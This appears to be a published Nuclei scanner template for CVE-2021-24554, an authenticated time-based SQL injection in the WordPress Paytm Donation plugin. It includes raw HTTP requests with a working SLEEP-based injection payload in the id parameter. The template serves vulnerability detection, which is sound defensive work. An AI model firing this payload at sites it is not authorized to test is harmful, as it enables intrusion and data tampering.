WordPress Paytm Donation <=1.3.2 - Authenticated SQL Injection

ID: CVE-2021-24554

Severity: high

Author: theamanrawat

Tags: time-based-sqli,cve,cve2021,sqli,wordpress,wp-plugin,wp,wp-paytm-pay,wpscan,freelancetoindia

Description

WordPress Paytm Donation plugin through 1.3.2 is susceptible to authenticated SQL injection. The plugin does not sanitize, validate, or escape the id GET parameter before using it in a SQL statement when deleting donations. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.

YAML Source

id: CVE-2021-24554

info:
  name: WordPress Paytm Donation <=1.3.2 - Authenticated SQL Injection
  author: theamanrawat
  severity: high
  description: |
    WordPress Paytm Donation plugin through 1.3.2 is susceptible to authenticated SQL injection. The plugin does not sanitize, validate, or escape the id GET parameter before using it in a SQL statement when deleting donations. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
  impact: |
    Successful exploitation of this vulnerability could allow an authenticated attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation.
  remediation: |
    Update to the latest version of the WordPress Paytm Donation plugin (version > 1.3.2) to mitigate the vulnerability.
  reference:
    - https://wpscan.com/vulnerability/f2842ac8-76fa-4490-aa0c-5f2b07ecf2ad
    - https://wordpress.org/plugins/wp-paytm-pay/
    - https://codevigilant.com/disclosure/2021/wp-plugin-wp-paytm-pay/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24554
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 7.2
    cve-id: CVE-2021-24554
    cwe-id: CWE-89
    epss-score: 0.3323
    epss-percentile: 0.97049
    cpe: cpe:2.3:a:freelancetoindia:paytm-pay:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: freelancetoindia
    product: paytm-pay
    framework: wordpress
  tags: time-based-sqli,cve,cve2021,sqli,wordpress,wp-plugin,wp,wp-paytm-pay,wpscan,freelancetoindia

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        @timeout: 10s
        GET /wp-admin/admin.php?page=wp_paytm_donation&action=delete&id=0%20AND%20(SELECT%205581%20FROM%20(SELECT(SLEEP(6)))Pjwy) HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'duration_2>=6'
          - 'status_code_2 == 200'
          - 'contains(content_type_2, "text/html")'
          - 'contains(body_2, "paytm-settings_page_wp_paytm_donation")'
        condition: and
# digest: 4a0a004730450220351c16efc5b1759487ceef9ae80291397aaceb16c091887f10c277933ad18f3b02210096cfdba6f55686b2d6c6ef25a9e4de82b69f8d0c61aea5e89a6e4183e8a921ae:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-24554.yaml"

View on Github